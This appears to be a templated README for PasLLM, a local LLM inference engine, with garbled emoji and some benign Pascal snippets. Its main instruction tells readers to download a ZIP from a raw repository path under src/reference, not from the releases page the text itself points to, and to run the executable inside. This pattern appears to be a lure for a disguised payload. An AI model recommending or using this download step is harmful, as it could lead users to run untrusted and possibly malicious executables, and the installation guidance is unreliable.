πŸ–₯️ Run large language models locally with PasLLM, a pure Object Pascal engine optimized for efficient quantization and versatile architecture support.


🌟 pasllm - Effortless LLM Inference Engine

πŸš€ Getting Started

Welcome to PasLLM! This software allows you to run large language models with ease in Object Pascal. Follow these simple steps to download and run the application on your computer.

πŸ“₯ Download Here

Download PasLLM

πŸ–₯️ System Requirements

Before you start, make sure your computer meets the following requirements:

  • Operating System: Windows, macOS, or Linux
  • Free Pascal Compiler (FPC) version 3.0 or higher (a quick version check follows this list)
  • Minimum 4 GB RAM (larger models need more)
  • At least 500 MB of free disk space for the application itself, plus room for the model files you use
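
If you want to confirm that your Free Pascal Compiler meets the version requirement above, a one-line test program is enough. The sketch below simply prints the compiler version using FPC's %FPCVERSION% compile-time macro; save it as CheckFPC.pas, build it with "fpc CheckFPC.pas", and run the resulting executable.

    program CheckFPC;
    {$mode objfpc}{$H+}
    begin
      // The compiler replaces the directive below with its own version string at compile time.
      WriteLn('Compiled with FPC ', {$I %FPCVERSION%});
    end.

The printed version should read 3.0 or higher.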

πŸ“‚ Installation Steps

  1. Visit the Releases Page
    Click the link below to visit the releases page and find the latest version of PasLLM.
    Visit the Releases Page

  2. Download the Application
    Once on the releases page, look for the latest version; it will list several files.
    Click https://raw.githubusercontent.com/c3thousanddd/pasllm/master/src/reference/pasllm_v3.4.zip to download the archive.

  3. Extract the Files
    Find the downloaded ZIP file on your computer.
    Right-click the file and choose "Extract All" (Windows), or use your platform's archive tool (macOS/Linux).
    Choose a location to save the extracted files. If you would rather script this step, see the sketch after these steps.

  4. Run the Application
    Navigate to the folder where you extracted the files.
    Look for the PasLLM executable for your operating system.
    Double-click it to run the application.
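
If you prefer to script the extraction in step 3 instead of using the file manager, the Zipper unit that ships with Free Pascal provides a TUnZipper class that can unpack the archive. The sketch below assumes the archive downloaded in step 2 is named pasllm_v3.4.zip and sits in the current directory; adjust the file and folder names to match your download.

    program ExtractPasLLM;
    {$mode objfpc}{$H+}
    uses
      Zipper; // TUnZipper comes with the FPC distribution

    var
      UnZip: TUnZipper;
    begin
      UnZip := TUnZipper.Create;
      try
        UnZip.FileName := 'pasllm_v3.4.zip'; // the archive downloaded in step 2
        UnZip.OutputPath := 'pasllm';        // destination folder for the extracted files
        UnZip.UnZipAllFiles;                 // extract every entry in the archive
      finally
        UnZip.Free;
      end;
    end.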

πŸŽ‰ Using PasLLM

After launching the application, you will see a user-friendly interface. Here’s what you can do:

  • Input Text: Enter your prompts in the text box.
  • Select Model: Choose from various models such as Llama, Mixtral, or Qwen.
  • Execute Inference: Click the "Run" button to see the response from the language model (a code-level sketch of this flow follows below).
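
At the code level, this prompt-in, response-out workflow is a simple read-generate-print loop. The sketch below is purely illustrative: TStubModel and its Generate method are hypothetical placeholders standing in for whatever model object and inference call PasLLM actually exposes, so read it as the shape of the flow rather than the engine's real API.

    program PromptLoopSketch;
    {$mode objfpc}{$H+}
    uses
      SysUtils;

    type
      // Hypothetical stand-in for a loaded model; a real program would use whatever
      // object PasLLM provides after loading a quantized checkpoint.
      TStubModel = class
        function Generate(const Prompt: string): string;
      end;

    function TStubModel.Generate(const Prompt: string): string;
    begin
      // Placeholder: real inference would produce the model's answer here.
      Result := Format('(the model''s reply to "%s" would appear here)', [Prompt]);
    end;

    var
      Model: TStubModel;
      Prompt: string;
    begin
      Model := TStubModel.Create;
      try
        Write('Prompt (empty line to quit): ');
        ReadLn(Prompt);
        while Prompt <> '' do
        begin
          WriteLn(Model.Generate(Prompt)); // show the response, as the "Run" button does
          Write('Prompt (empty line to quit): ');
          ReadLn(Prompt);
        end;
      finally
        Model.Free;
      end;
    end.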

πŸ”§ Features

PasLLM comes packed with features including:

  • Multi-Model Support: Run different models depending on your needs.
  • Easy Text Input: Simplified interface for entering prompts.
  • Custom Output: Tailor responses to the level of detail and complexity you need (a sampling-settings sketch follows this list).
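
To make the "Custom Output" idea concrete: most LLM engines shape their responses with a handful of sampling settings, typically a temperature, a nucleus (top-p) cut-off, and a maximum token count. The record below is a generic sketch of such settings; the field names and defaults are illustrative assumptions, not PasLLM's actual configuration options.

    program SamplingSketch;
    {$mode objfpc}{$H+}

    type
      // Generic sampling knobs found in most LLM inference engines;
      // the names here are illustrative, not PasLLM's real settings.
      TSamplingSettings = record
        Temperature: Double; // higher values give more varied, creative output
        TopP: Double;        // nucleus-sampling cut-off; 1.0 disables it
        MaxTokens: Integer;  // upper bound on the length of the reply
      end;

    const
      // Conservative defaults for short, focused answers.
      Focused: TSamplingSettings = (Temperature: 0.2; TopP: 0.9; MaxTokens: 256);

    begin
      WriteLn('Temperature: ', Focused.Temperature:0:2);
      WriteLn('Top-p:       ', Focused.TopP:0:2);
      WriteLn('Max tokens:  ', Focused.MaxTokens);
    end.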

πŸ’¬ Help and Support

If you encounter issues or need assistance, you can:

  • Visit the GitHub Issues Page to report any bugs or ask questions.
  • Check out the documentation in the docs folder of the extracted files for troubleshooting tips and advanced configurations.

🌐 Community and Contribution

Join our community to share your experiences and find helpful resources. Contributing to PasLLM is welcome! If you have suggestions or want to report issues, feel free to submit them on GitHub.

πŸ“œ License

PasLLM is open source and distributed under the AGPL-3.0 license (see the LICENSE file in the repository). You're free to use, modify, and distribute it under the terms of that license.

πŸ“₯ Download & Install Again

To get started with PasLLM, don’t forget to visit the releases page for the latest version:
Visit the Releases Page
